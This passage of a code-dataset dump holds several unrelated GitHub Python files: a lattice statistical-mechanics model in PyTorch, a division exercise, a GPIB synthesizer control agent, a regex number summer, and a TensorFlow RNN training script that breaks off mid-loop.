else:\n return super(OnSite, self).extra_repr()\n \n def forward(self, input):\n super(OnSite, self).forward()\n dims = tuple(range(-self.lattice.dimension,0))\n energy = self.group.val(input, self.val_table) * self.strength\n return energy.sum(dims)\n \nclass TwoBody(EnergyTerm):\n \"\"\" two-body interaction term \"\"\"\n def __init__(self, val_table = None, shifts = None):\n super(TwoBody, self).__init__()\n self.val_table = val_table.to(device)\n self.shifts = shifts\n \n def extra_repr(self):\n if not self.val_table is None:\n return 'G -> {} across {}'.format(\n (self.val_table * self.strength).tolist(),\n self.shifts if not self.shifts is None else '(0,...)')\n elif not self.shifts is None:\n return '{} across {}'. format(\n self.strength,\n self.shifts)\n else:\n return super(TwoBody, self).extra_repr()\n \n def forward(self, input):\n super(TwoBody, self).forward()\n dims = tuple(range(-self.lattice.dimension,0))\n if self.shifts is None:\n self.shifts = (0,)*self.lattice.dimension\n rolled = self.group.inv(input.roll(self.shifts, dims))\n coupled = self.group.mul(rolled, input)\n energy = self.group.val(coupled, self.val_table) * self.strength\n return energy.sum(dims)\n\nclass Energy(nn.Module):\n \"\"\" Energy mdoel that describes the physical system. 
Provides function to evaluate energy.\n \n Args:\n energy: lattice Hamiltonian in terms of energy terms\n group: a specifying the group on each site\n lattice: a lattice system containing information of the group and lattice shape\n \"\"\"\n def __init__(self, energy: EnergyTerms, group: Group, lattice: Lattice):\n super(Energy, self).__init__()\n self.group = group\n self.lattice = lattice\n self.update(energy)\n \n def extra_repr(self):\n return '(group): {}\\n(lattice): {}'.format(self.group, self.lattice) + super(Energy, self).extra_repr()\n \n def forward(self, input):\n return self.energy(input)\n\n def update(self, energy):\n self.energy = energy.on(self.group, self.lattice)\n\n\"\"\" -------- Transformations -------- \"\"\"\n\nclass HaarTransform(dist.Transform):\n \"\"\" Haar wavelet transformation (bijective)\n transformation takes real space configurations x to wavelet space encoding y\n \n Args:\n group: a group structure for each unit\n lattice: a lattice system containing information of the group and lattice shape\n \"\"\"\n def __init__(self, group: Group, lattice: Lattice):\n super(HaarTransform, self).__init__()\n self.group = group\n self.lattice = lattice\n self.bijective = True\n self.make_wavelet()\n \n # construct Haar wavelet basis\n def make_wavelet(self):\n wavelet = torch.zeros(torch.Size([self.lattice.sites, self.lattice.sites]), dtype=torch.int)\n wavelet[0] = 1\n for z in range(1,self.lattice.tree_depth):\n block_size = 2**(z-1)\n for q in range(block_size):\n node_range = 2**(self.lattice.tree_depth-1-z) * torch.tensor([2*q+1,2*q+2])\n nodes = torch.arange(*node_range)\n sites = self.lattice.node_index[nodes]\n wavelet[block_size + q, sites] = 1 \n self.wavelet = wavelet.to(device)\n \n def _call(self, z):\n x = self.group.prod(z.unsqueeze(-1) * self.wavelet, -2)\n return x.view(z.size()[:-1]+torch.Size(self.lattice.shape))\n \n def _inverse(self, x):\n y = x.flatten(-self.lattice.dimension)[...,self.lattice.node_index]\n def renormalize(y):\n if y.size(-1) > 1:\n y0 = y[...,0::2]\n y1 = y[...,1::2]\n return torch.cat((renormalize(y0), self.group.mul(self.group.inv(y0), y1)), -1)\n else:\n return y\n z = renormalize(y)\n return z\n \n def log_abs_det_jacobian(self, x, y):\n return torch.tensor(0.)\n\nclass OneHotCategoricalTransform(dist.Transform):\n \"\"\"Convert between one-hot and categorical representations.\n \n Args:\n num_classes: number of classes.\"\"\"\n def __init__(self, num_classes: int):\n super(OneHotCategoricalTransform, self).__init__()\n self.num_classes = num_classes\n self.bijective = True\n \n def _call(self, x):\n # one-hot to categorical\n return x.max(dim=-1)[1]\n \n def _inverse(self, y):\n # categorical to one-hot\n return F.one_hot(y, self.num_classes).to(dtype=torch.float)\n \n def log_abs_det_jacobian(self, x, y):\n return torch.tensor(0.)\n\n\"\"\" -------- Base Distribution -------- \"\"\"\n\nclass GraphConv(nn.Module):\n \"\"\" Graph Convolution layer \n \n Args:\n graph: tensor of shape [3, num_edges] \n specifying (source, target, type) along each column\n in_features: number of input features (per node)\n out_features: number of output features (per node)\n bias: whether to learn an edge-depenent bias\n self_loop: whether to include self loops in message passing\n \"\"\"\n def __init__(self, graph: torch.Tensor, in_features: int, out_features: int,\n bias: bool = True, self_loop: bool = True):\n super(GraphConv, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n if bias:\n self.bias = 
bias\n else:\n self.register_parameter('bias', None)\n self.edge_types = None\n self.update_graph(graph)\n self.self_loop = self_loop\n\n def update_graph(self, graph):\n # update the graph, adding new linear maps if needed\n self.graph = graph\n edge_types = graph[-1].max() + 1\n if edge_types != self.edge_types:\n self.weight = nn.Parameter(torch.Tensor(edge_types, self.out_features, self.in_features))\n if self.bias is not None:\n self.bias = nn.Parameter(torch.Tensor(edge_types, self.out_features))\n self.reset_parameters()\n self.edge_types = edge_types\n return self\n\n def reset_parameters(self):\n nn.init.kaiming_uniform_(self.weight, a=math.sqrt(5))\n if self.bias is not None:\n fan_in, _ = nn.init._calculate_fan_in_and_fan_out(self.weight)\n bound = 1 / math.sqrt(fan_in)\n nn.init.uniform_(self.bias, -bound, bound)\n \n def extra_repr(self):\n return 'edge_types={}, in_features={}, out_features={}, bias={}, self_loop={}'.format(\n self.edge_types, self.in_features, self.out_features, self.bias is not None, self.self_loop)\n\n def forward(self, input, j = None):\n # forward from a source node, indexed by j\n # if j is None, forward all nodes\n if j is None: # forward all nodes together\n if self.self_loop: # if self loop allowed\n typ0 = 0 # typ starts from 0\n else: # if self loop forbidden\n typ0 = 1 # typ starts from 1\n output = None\n for typ in range(typ0, self.edge_types):\n mask = (self.graph[2] == typ)\n if output is None:\n output = self.propagate_homo(self.graph[:2, mask], input, typ)\n else:\n output += self.propagate_homo(self.graph[:2, mask], input, typ)\n else: # forward from specific node\n graph = self.graph\n mask = (graph[0] == j) # mask out edges from other nodes\n graph = graph[:, mask]\n if not self.self_loop: # no self loop\n mask = (graph[2] != 0) # mask out self loops\n graph = graph[:, mask]\n output = self.propagate_hetero(graph, input)\n return output\n\n def propagate_homo(self, graph, input, typ):\n [source, target] = graph\n signal = input[..., source, :] # shape [..., E, in_features]\n if self.bias is None:\n message = F.linear(signal, self.weight[typ]) # shape: [..., E, out_features]\n else:\n message = F.linear(signal, self.weight[typ], self.bias[typ]) # shape: [..., E, out_features]\n output = torch_scatter.scatter_add(message, target,\n dim = -2, dim_size = input.size(-2))\n return output # shape: [..., N, out_features]\n\n def propagate_hetero(self, graph, input):\n # input: shape [..., N, in_features]\n [source, target, edge_type] = graph\n signal = input[..., source, :] # shape [..., E, in_features]\n weight = self.weight[edge_type] # shape [E, out_features, in_features]\n message = torch.sum(weight * signal.unsqueeze(-2), -1) # shape [..., E, out_features]\n if self.bias is not None:\n bias = self.bias[edge_type] # shape [E, out_features]\n message += bias\n output = torch_scatter.scatter_add(message, target,\n dim = -2, dim_size = input.size(-2))\n return output # shape: [..., N, out_features]\n\nclass Autoregressive(nn.Module, dist.Distribution):\n \"\"\" Represent a generative model that can generate samples and evaluate log probabilities.\n \n Args:\n lattice: lattice system\n features: a list of feature dimensions for all layers\n nonlinearity: activation function to use \n bias: whether to learn the bias\n \"\"\"\n \n def __init__(self, lattice: Lattice, features, nonlinearity: str = 'Tanh', bias: bool = True):\n super(Autoregressive, self).__init__()\n self.lattice = lattice\n self.nodes = lattice.sites\n self.features = features\n 
dist.Distribution.__init__(self, event_shape=torch.Size([self.nodes, self.features[0]]))\n self.has_rsample = True\n self.graph = self.lattice.causal_graph()\n self.layers = nn.ModuleList()\n for l in range(1, len(self.features)):\n if l == 1: # the first layer should not have self loops\n self.layers.append(GraphConv(self.graph, self.features[0], self.features[1], bias, self_loop = False))\n else: # remaining layers are normal\n self.layers.append(nn.LayerNorm([self.features[l - 1]]))\n self.layers.append(getattr(nn, nonlinearity)()) # activatioin layer\n self.layers.append(GraphConv(self.graph, self.features[l - 1], self.features[l], bias))\n\n def update_graph(self, graph):\n # update graph for all GraphConv layers\n self.graph = graph\n for layer in self.layers:\n if isinstance(layer, GraphConv):\n layer.update_graph(graph)\n return self\n\n def forward(self, input):\n output = input\n for layer in self.layers: # apply layers\n output = layer(output)\n return output # logits\n \n def log_prob(self, sample):\n logits = self(sample) # forward pass to get logits\n return torch.sum(sample * F.log_softmax(logits, dim=-1), (-2,-1))\n\n def sampler(self, logits, dim=-1): # simplified from F.gumbel_softmax\n gumbels = -torch.empty_like(logits, memory_format=torch.legacy_contiguous_format).exponential_().log()\n gumbels += logits.detach()\n index = gumbels.max(dim, keepdim=True)[1]\n return torch.zeros_like(logits, memory_format=torch.legacy_contiguous_format).scatter_(dim, index, 1.0)\n\n def _sample(self, sample_size: int, sampler = None):\n if sampler is None: # if no sampler specified, use default\n sampler = self.sampler\n # create a list of tensors to cache layer-wise outputs\n cache = [torch.zeros(sample_size, self.nodes, self.features[0], device=device)]\n for layer in self.layers:\n if isinstance(layer, GraphConv): # for graph convolution layers\n features = layer.out_features # features get updated\n cache.append(torch.zeros(sample_size, self.nodes, features, device=device))\n # cache established. 
start by sampling node 0.\n # assuming global symmetry, node 0 is always sampled uniformly\n cache[0][..., 0, :] = sampler(cache[0][..., 0, :])\n # start autoregressive sampling\n for j in range(1, self.nodes): # iterate through nodes 1:all\n for l, layer in enumerate(self.layers):\n if isinstance(layer, GraphConv): # for graph convolution layers\n if l==0: # first layer should forward from previous node\n cache[l + 1] += layer(cache[l], j - 1)\n else: # remaining layers forward from this node\n cache[l + 1] += layer(cache[l], j)\n else: # for other layers, only update node j (other nodes not ready yet)\n src = layer(cache[l][..., [j], :])\n index = src.new_full(src.size(), j, dtype=torch.long)\n cache[l + 1] = cache[l + 1].scatter(-2, index, src)\n # the last cache hosts the logit, sample from it \n cache[0][..., j, :] = sampler(cache[-1][..., j, :])\n return cache # cache[0] hosts the sample\n \n def sample(self, sample_size=1):\n with torch.no_grad():\n cache = self._sample(sample_size)\n return cache[0]\n \n def rsample(self, sample_size=1, tau=None, hard=False):\n # reparametrized Gumbel sampling\n if tau is None: # if temperature not given\n tau = 1/(self.features[-1]-1) # set by the out feature dimension\n cache = self._sample(sample_size, lambda x: F.gumbel_softmax(x, tau, hard))\n return cache[0]\n\n def sample_with_log_prob(self, sample_size=1):\n cache = self._sample(sample_size)\n sample = cache[0]\n logits = cache[-1]\n log_prob = torch.sum(sample * F.log_softmax(logits, dim=-1), (-2,-1))\n return sample, log_prob\n\n\n\"\"\" -------- Model Interface -------- \"\"\"\n\nclass HolographicPixelGNN(nn.Module, dist.TransformedDistribution):\n \"\"\" Combination of hierarchical autoregressive and flow-based model for lattice models.\n \n Args:\n energy: a energy model to learn\n hidden_features: a list of feature dimensions of hidden layers\n nonlinearity: activation function to use \n bias: whether to learn the additive bias in heap linear layers\n \"\"\"\n def __init__(self, energy: Energy, hidden_features, nonlinearity: str = 'Tanh', bias: bool = True):\n super(HolographicPixelGNN, self).__init__()\n self.energy = energy\n self.group = energy.group\n self.lattice = energy.lattice\n self.haar = HaarTransform(self.group, self.lattice)\n self.onecat = OneHotCategoricalTransform(self.group.order)\n features = [self.group.order] + hidden_features + [self.group.order]\n auto = Autoregressive(self.lattice, features, nonlinearity, bias)\n dist.TransformedDistribution.__init__(self, auto, [self.onecat, self.haar])\n self.transform = dist.ComposeTransform(self.transforms)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"EverettYou/AutoregressiveStatMech","sub_path":"pixel_gnn/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":24487,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"81"} +{"seq_id":"10440976245","text":"# 1.\tDivision Error Handling: Write a program that takes two numbers as input and handles the division by zero exception using a try-except block.\n\na=int(input(\"enter the first number:\"))\nb=int(input(\"enter the second numbeer:\"))\n\n\ntry:\n\n c=a/b\n print(\"Result: \",c)\nexcept:\n print(\"can't divide by zero....!\")\nelse:\n print(a/b)\n","repo_name":"shiixxam/python_in_30_days","sub_path":"python/Day10/Exception handling/Q1.py","file_name":"Q1.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} 
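The small exercise record just above (Day10/Q1.py) demonstrates division-by-zero handling with a bare `except:` and an `else:` branch that repeats the division. As a side note, a tighter version of the same idea catches the specific exceptions and computes the result only once inside `try`; the sketch below is an illustration under that assumption and is not part of any record in this dataset.

```python
# Minimal sketch (illustration only, not taken from the corpus records above):
# catch specific exceptions rather than using a bare `except:`.
try:
    a = int(input("enter the first number: "))
    b = int(input("enter the second number: "))
    result = a / b            # may raise ZeroDivisionError
except ValueError:
    print("please enter whole numbers only")
except ZeroDivisionError:
    print("can't divide by zero....!")
else:
    print("Result:", result)  # runs only if no exception was raised
```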
+{"seq_id":"1937563539","text":"import re\nimport socket\nfrom agent import Agent\n\nclass SynthAgent(Agent):\n def __init__(self, addr=('gpib_adapter', 1234)):\n self.__addr = addr\n self.__keys = ['CFRQ/VALUE', 'RFLV/VALUE']\n self.__term = '\\n'\n\n def _recv(self):\n data = ''\n conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n conn.connect(self.__addr)\n conn.settimeout(10)\n conn.send('++read' + self.__term)\n while data.find(self.__term) < 0:\n data += conn.recv(1024)\n conn.close()\n return data[:data.find(self.__term)]\n\n def _send(self, data):\n data = data.strip()\n conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n conn.connect(self.__addr)\n conn.send(data + self.__term)\n conn.close()\n\n def get(self, keys=['index']):\n result = []\n if keys != ['index']:\n for key in keys:\n if key not in self.__keys:\n result.append('Error')\n continue\n if key.find('/') < 0: key += '/VALUE'\n self._send(str(key).replace('/', ':') + '?')\n #!!! More logic is probably necessary to filter\n #!!! what comes back\n #result.append(self._recv().strip(': \\n'))\n # Default to MHz for center freq. value.\n received = self._recv().strip(': \\n')\n if key == 'CFRQ/VALUE':\n result.append(re.sub('000000.0$', 'M', received, 1) + 'Hz')\n else:\n result.append(received)\n else:\n result = self.__keys\n return result\n\n def set(self, keys, values):\n \"\"\"Sets parameters for the Synthesizer.\n\n Attmempts to ensure that the value was set correctly by writing\n then reading back and checking the value against the request.\n \"\"\"\n #!!! Stress test\n result = []\n for key, value in zip(keys, values):\n #self._send('%s %s' % (key.replace('/', ':'), value))\n # Default to MHz for center freq. value.\n if key == 'CFRQ/VALUE':\n value = value.strip('MmHhZz') + '000000'\n self._send('%s %s' % (key.replace('/', ':'), value))\n test = self.get([key])[0].replace('M', '000000').strip('HhZz')\n if key.find('/') < 0:\n regex = re.compile('[0-9]+\\.[0-9]+;', re.IGNORECASE)\n match = regex.search(test)\n if match:\n test = match.group()\n tmp = value.replace('M', '000000').strip('HhZz')\n result.append(\n str(float(tmp) == float(test[:-1])))\n else:\n result.append('False')\n else:\n tmp = value.replace('M', '000000').strip('HhZz')\n result.append(str(float(tmp) == float(test)))\n return result\n\n#AgentClass = SynthAgent\n","repo_name":"nrao/guppi-controller","sub_path":"src/synth_agent.py","file_name":"synth_agent.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"21937600468","text":"#!/usr/local/bin/python3\n\nimport re\n\nfname = input(\"Enter file name: \")\nfh = open(fname)\nsum = 0\n\nfor line in fh:\n nums_in_line = re.findall('[0-9]+', line)\n if len(nums_in_line) > 0:\n for num_string in nums_in_line:\n sum = sum + int(num_string)\n else:\n continue\nfh.close()\nprint(sum)\n","repo_name":"druidix/py4e","sub_path":"regex-find-sum.py","file_name":"regex-find-sum.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17205729064","text":"#!/bin/python\r\n\r\n# Blake A Holman\r\n# Neural Network using Tensorflow\r\n# URL: https://blog.goodaudience.com/first-experience-of-building-a-lstm-model-with-tensorflow-e632bde911e1\r\n\r\nimport sys\r\n\r\n# Ignore Future warning error\r\nimport warnings\r\nwarnings.simplefilter(action='ignore', 
category=FutureWarning)\r\nwarnings.filterwarnings('ignore')\r\n# Check that the python version being used is Python3\r\nmajor_python_version = sys.version_info[0]\r\nif major_python_version != 3:\r\n\tprint(\"ERROR: You need to use Python 3 to run this program\")\r\n\texit(1)\r\n\r\nimport tensorflow as tf # Machine Learning framework\r\nimport numpy as np # Array and matrix library\r\n#from tensorflow.contrib import rnn\r\n#from tensorflow import keras\r\n#from sklearn.model_selection import train_test_split\r\n#from sklearn.metrics import f1_score, accuracy_score, recall_score, precision_score\r\n#import Get_NN_Input_ToCSV\r\nimport csv # Read CSV labels\r\nimport json\r\nimport os\r\nimport random\r\n\r\ndef main():\r\n\t## Read Data ##\r\n\tprint(\"Getting Neural Network Input\")\r\n\t#device_ids, device_withConvNum, path = Get_NN_Input_ToCSV.main()\r\n\r\n\tpath = \"json_conv\"\r\n\r\n\t## Setup RNN ##\r\n\t# Parameter Specification\r\n\tn_classes = 9\t# Number of output nodes/classification types\r\n\tn_units = 18\t# Size of hidden state\r\n\tprint(\"hidden layer size = \", n_units)\r\n\tn_features = 2\t# Number of features in the dataset\r\n\r\n\t# Define Placeholders\r\n\ttf.compat.v1.disable_eager_execution()\r\n\txplaceholder= tf.compat.v1.placeholder('float',[None,n_features], name=\"xplaceholder\") # Holds batch of feature data\r\n\typlaceholder = tf.compat.v1.placeholder('float',[n_classes], name=\"yplaceholder\") # Holds batch of label data\r\n\r\n\t# Setup Rnn\r\n\tprint(\"Setting Up Neural Network\")\r\n\tcost, optimizer, logit, accuracy, pred = setup_neural_network(xplaceholder, yplaceholder, n_features, n_units, n_classes)\r\n\r\n\t## Get Device Labels ##\r\n\t# Seperate Features and Labels\r\n\tlabels_path = 'device_labels.csv'\r\n\tdevice_labels = {}\r\n\r\n\t# Open CSV file and finds device labels\r\n\tf = open(labels_path)\r\n\tlabels_file = csv.reader(f, delimiter=',')\r\n\tline_count = 0\r\n\tfor row in labels_file:\r\n\t\tif len(row) > 0 and str(row[0]) != \"\" and line_count > 0:\r\n\t\t\t# Add the current entry to labels\r\n\t\t\tdevice_labels[str(row[0])] = int(row[3])\r\n\t\tline_count += 1\r\n\tf.close()\r\n\r\n\tsaver = tf.compat.v1.train.Saver()\r\n\t# Gets data for each device and runs through neural network\r\n\twith tf.compat.v1.Session() as sess:\r\n\t\ttf.compat.v1.global_variables_initializer().run()\r\n\t\ttf.compat.v1.local_variables_initializer().run()\r\n\t\t\r\n\t\tfiles_perClass = 5000\r\n\t\ttotal_acc = 0\r\n\t\ttotal_it = 0\r\n\r\n\t\tfor iters in range(20):\r\n\t\t\tX_train_files = []\r\n\t\t\tX_train = []\r\n\t\t\ty_train = []\r\n\t\t\ty_train_overall = []\r\n\t\t\ttotal_train_files = 0\r\n\r\n\t\t\tif len(os.listdir(os.path.join(os.getcwd(),path,\"class_0\"))) != 0:\r\n\t\t\t\tX_train_files.extend(np.random.choice(os.listdir(os.path.join(os.getcwd(),path,\"class_0\")),files_perClass))\r\n\t\t\t\tfor i in range(0,files_perClass):\r\n\t\t\t\t\ty_train_overall.append([1,0,0,0,0,0,0,0,0])\r\n\t\t\t\ttotal_train_files += files_perClass\r\n\t\t\tif len(os.listdir(os.path.join(os.getcwd(),path,\"class_1\"))) != 0:\r\n\t\t\t\tX_train_files.extend(np.random.choice(os.listdir(os.path.join(os.getcwd(),path,\"class_1\")),files_perClass))\r\n\t\t\t\tfor i in range(0,files_perClass):\r\n\t\t\t\t\ty_train_overall.append([0,1,0,0,0,0,0,0,0])\r\n\t\t\t\ttotal_train_files += files_perClass\r\n\t\t\tif len(os.listdir(os.path.join(os.getcwd(),path,\"class_2\"))) != 
0:\r\n\t\t\t\tX_train_files.extend(np.random.choice(os.listdir(os.path.join(os.getcwd(),path,\"class_2\")),files_perClass))\r\n\t\t\t\tfor i in range(0,files_perClass):\r\n\t\t\t\t\ty_train_overall.append([0,0,1,0,0,0,0,0,0])\r\n\t\t\t\ttotal_train_files += files_perClass\r\n\t\t\tif len(os.listdir(os.path.join(os.getcwd(),path,\"class_3\"))) != 0:\r\n\t\t\t\tX_train_files.extend(np.random.choice(os.listdir(os.path.join(os.getcwd(),path,\"class_3\")),files_perClass))\r\n\t\t\t\tfor i in range(0,files_perClass):\r\n\t\t\t\t\ty_train_overall.append([0,0,0,1,0,0,0,0,0])\r\n\t\t\t\ttotal_train_files += files_perClass\r\n\t\t\tif len(os.listdir(os.path.join(os.getcwd(),path,\"class_4\"))) != 0:\r\n\t\t\t\tX_train_files.extend(np.random.choice(os.listdir(os.path.join(os.getcwd(),path,\"class_4\")),files_perClass))\r\n\t\t\t\tfor i in range(0,files_perClass):\r\n\t\t\t\t\ty_train_overall.append([0,0,0,0,1,0,0,0,0])\r\n\t\t\t\ttotal_train_files += files_perClass\r\n\t\t\tif len(os.listdir(os.path.join(os.getcwd(),path,\"class_5\"))) != 0:\r\n\t\t\t\tX_train_files.extend(np.random.choice(os.listdir(os.path.join(os.getcwd(),path,\"class_5\")),files_perClass))\r\n\t\t\t\tfor i in range(0,files_perClass):\r\n\t\t\t\t\ty_train_overall.append([0,0,0,0,0,1,0,0,0])\r\n\t\t\t\ttotal_train_files += files_perClass\r\n\t\t\tif len(os.listdir(os.path.join(os.getcwd(),path,\"class_6\"))) != 0:\r\n\t\t\t\tX_train_files.extend(np.random.choice(os.listdir(os.path.join(os.getcwd(),path,\"class_6\")),files_perClass))\r\n\t\t\t\tfor i in range(0,files_perClass):\r\n\t\t\t\t\ty_train_overall.append([0,0,0,0,0,0,1,0,0])\r\n\t\t\t\ttotal_train_files += files_perClass\r\n\t\t\tif len(os.listdir(os.path.join(os.getcwd(),path,\"class_7\"))) != 0:\r\n\t\t\t\tX_train_files.extend(np.random.choice(os.listdir(os.path.join(os.getcwd(),path,\"class_7\")),files_perClass))\r\n\t\t\t\tfor i in range(0,files_perClass):\r\n\t\t\t\t\ty_train_overall.append([0,0,0,0,0,0,0,1,0])\r\n\t\t\t\ttotal_train_files += files_perClass\r\n\t\t\tif len(os.listdir(os.path.join(os.getcwd(),path,\"class_8\"))) != 0:\r\n\t\t\t\tX_train_files.extend(np.random.choice(os.listdir(os.path.join(os.getcwd(),path,\"class_8\")),files_perClass))\r\n\t\t\t\tfor i in range(0,files_perClass):\r\n\t\t\t\t\ty_train_overall.append([0,0,0,0,0,0,0,0,1])\r\n\t\t\t\ttotal_train_files += files_perClass\r\n\t\t\t\r\n\t\t\tprint(\"Shuffling Train Data\")\r\n\t\t\tindex_shuf = list(range(len(X_train_files)))\r\n\t\t\trandom.shuffle(index_shuf)\r\n\t\t\t\r\n\t\t\tfor i in index_shuf:\r\n\t\t\t\tclass_index = np.argmax(np.array(y_train_overall[i]))\r\n\t\t\t\tclass_name = str(\"class_\" + str(class_index))\r\n\r\n\t\t\t\tf = open(os.path.join(os.getcwd(), path, class_name, str(X_train_files[i])))\r\n\t\t\t\tconv_file = csv.reader(f, delimiter=',')\r\n\t\t\t\tconv = []\r\n\t\t\t\tfor row in conv_file:\r\n\t\t\t\t\tif len(row) > 0:\r\n\t\t\t\t\t\ttL = []\r\n\t\t\t\t\t\ttL.append(float(row[0]))\r\n\t\t\t\t\t\ttL.append(float(row[1]))\r\n\t\t\t\t\t\tconv.append(tL)\r\n\t\t\t\tX_train.append(conv)\r\n\t\t\t\ty_train.append(y_train_overall[i])\r\n\t\t\t\tf.close()\r\n\r\n\t\t\ttotal_acc += train_neural_network(sess,X_train,y_train,xplaceholder,yplaceholder,cost,optimizer, accuracy,total_train_files)\r\n\t\t\ttotal_it += 1\r\n\r\n\t\tTraining_Accuracy = total_acc / total_it\r\n\t\tprint(\"Total Training Accuracy\", Training_Accuracy)\r\n\r\n\t\tsaver.save(sess,\"my_test_model\")\r\n\r\n\t\t#True_Number = {\"0\": 0,\"1\": 0,\"2\": 0,\"3\": 0,\"4\": 0,\"5\": 0,\"6\": 0,\"7\": 0,\"8\": 
0,\"9\": 0,\"10\": 0,\"11\": 0,\"12\": 0,\"13\": 0,\"14\": 0,\"15\": 0,\"16\": 0,\"17\": 0,\"18\": 0,\"19\": 0,\"20\": 0}\r\n\t\t#Total_Number = {\"0\": 0,\"1\": 0,\"2\": 0,\"3\": 0,\"4\": 0,\"5\": 0,\"6\": 0,\"7\": 0,\"8\": 0,\"9\": 0,\"10\": 0,\"11\": 0,\"12\": 0,\"13\": 0,\"14\": 0,\"15\": 0,\"16\": 0,\"17\": 0,\"18\": 0,\"19\": 0,\"20\": 0}\r\n\t\tTrue_Number = {\"0\": 0,\"1\": 0,\"2\": 0,\"3\": 0,\"4\": 0,\"5\": 0,\"6\": 0,\"7\": 0,\"8\": 0}\r\n\t\tTotal_Number = {\"0\": 0,\"1\": 0,\"2\": 0,\"3\": 0,\"4\": 0,\"5\": 0,\"6\": 0,\"7\": 0,\"8\": 0}\r\n\t\tmax_distance = {\"0\": 0,\"1\": 0,\"2\": 0,\"3\": 0,\"4\": 0,\"5\": 0,\"6\": 0,\"7\": 0,\"8\": 0}\r\n\r\n\t\twrong_id = {\"class_0\": {\"0\": 0,\"1\": 0,\"2\": 0,\"3\": 0,\"4\": 0,\"5\": 0,\"6\": 0,\"7\": 0,\"8\": 0},\r\n\t\t\t\t\t\"class_1\": {\"0\": 0,\"1\": 0,\"2\": 0,\"3\": 0,\"4\": 0,\"5\": 0,\"6\": 0,\"7\": 0,\"8\": 0},\r\n\t\t\t\t\t\"class_2\": {\"0\": 0,\"1\": 0,\"2\": 0,\"3\": 0,\"4\": 0,\"5\": 0,\"6\": 0,\"7\": 0,\"8\": 0},\r\n\t\t\t\t\t\"class_3\": {\"0\": 0,\"1\": 0,\"2\": 0,\"3\": 0,\"4\": 0,\"5\": 0,\"6\": 0,\"7\": 0,\"8\": 0},\r\n\t\t\t\t\t\"class_4\": {\"0\": 0,\"1\": 0,\"2\": 0,\"3\": 0,\"4\": 0,\"5\": 0,\"6\": 0,\"7\": 0,\"8\": 0},\r\n\t\t\t\t\t\"class_5\": {\"0\": 0,\"1\": 0,\"2\": 0,\"3\": 0,\"4\": 0,\"5\": 0,\"6\": 0,\"7\": 0,\"8\": 0},\r\n\t\t\t\t\t\"class_6\": {\"0\": 0,\"1\": 0,\"2\": 0,\"3\": 0,\"4\": 0,\"5\": 0,\"6\": 0,\"7\": 0,\"8\": 0},\r\n\t\t\t\t\t\"class_7\": {\"0\": 0,\"1\": 0,\"2\": 0,\"3\": 0,\"4\": 0,\"5\": 0,\"6\": 0,\"7\": 0,\"8\": 0},\r\n\t\t\t\t\t\"class_8\": {\"0\": 0,\"1\": 0,\"2\": 0,\"3\": 0,\"4\": 0,\"5\": 0,\"6\": 0,\"7\": 0,\"8\": 0}}\r\n\t\t\r\n\t\ttest_files_perClass = 500\r\n\r\n\t\tfor iters in range(20):\r\n\t\t\tX_test_files = []\r\n\t\t\tX_test = []\r\n\t\t\ty_test = []\r\n\t\t\ty_test_overall = []\r\n\t\t\ttest_total_files = 0\r\n\r\n\t\t\tif len(os.listdir(os.path.join(os.getcwd(),path,\"class_0\"))) != 0:\r\n\t\t\t\tX_test_files.extend(np.random.choice(os.listdir(os.path.join(os.getcwd(),path,\"class_0\")),test_files_perClass))\r\n\t\t\t\tfor i in range(0,test_files_perClass):\r\n\t\t\t\t\ty_test_overall.append([1,0,0,0,0,0,0,0,0])\r\n\t\t\t\ttest_total_files += test_files_perClass\r\n\t\t\tif len(os.listdir(os.path.join(os.getcwd(),path,\"class_1\"))) != 0:\r\n\t\t\t\tX_test_files.extend(np.random.choice(os.listdir(os.path.join(os.getcwd(),path,\"class_1\")),test_files_perClass))\r\n\t\t\t\tfor i in range(0,test_files_perClass):\r\n\t\t\t\t\ty_test_overall.append([0,1,0,0,0,0,0,0,0])\r\n\t\t\t\ttest_total_files += test_files_perClass\r\n\t\t\tif len(os.listdir(os.path.join(os.getcwd(),path,\"class_2\"))) != 0:\r\n\t\t\t\tX_test_files.extend(np.random.choice(os.listdir(os.path.join(os.getcwd(),path,\"class_2\")),test_files_perClass))\r\n\t\t\t\tfor i in range(0,test_files_perClass):\r\n\t\t\t\t\ty_test_overall.append([0,0,1,0,0,0,0,0,0])\r\n\t\t\t\ttest_total_files += test_files_perClass\r\n\t\t\tif len(os.listdir(os.path.join(os.getcwd(),path,\"class_3\"))) != 0:\r\n\t\t\t\tX_test_files.extend(np.random.choice(os.listdir(os.path.join(os.getcwd(),path,\"class_3\")),test_files_perClass))\r\n\t\t\t\tfor i in range(0,test_files_perClass):\r\n\t\t\t\t\ty_test_overall.append([0,0,0,1,0,0,0,0,0])\r\n\t\t\t\ttest_total_files += test_files_perClass\r\n\t\t\tif len(os.listdir(os.path.join(os.getcwd(),path,\"class_4\"))) != 0:\r\n\t\t\t\tX_test_files.extend(np.random.choice(os.listdir(os.path.join(os.getcwd(),path,\"class_4\")),test_files_perClass))\r\n\t\t\t\tfor i in 
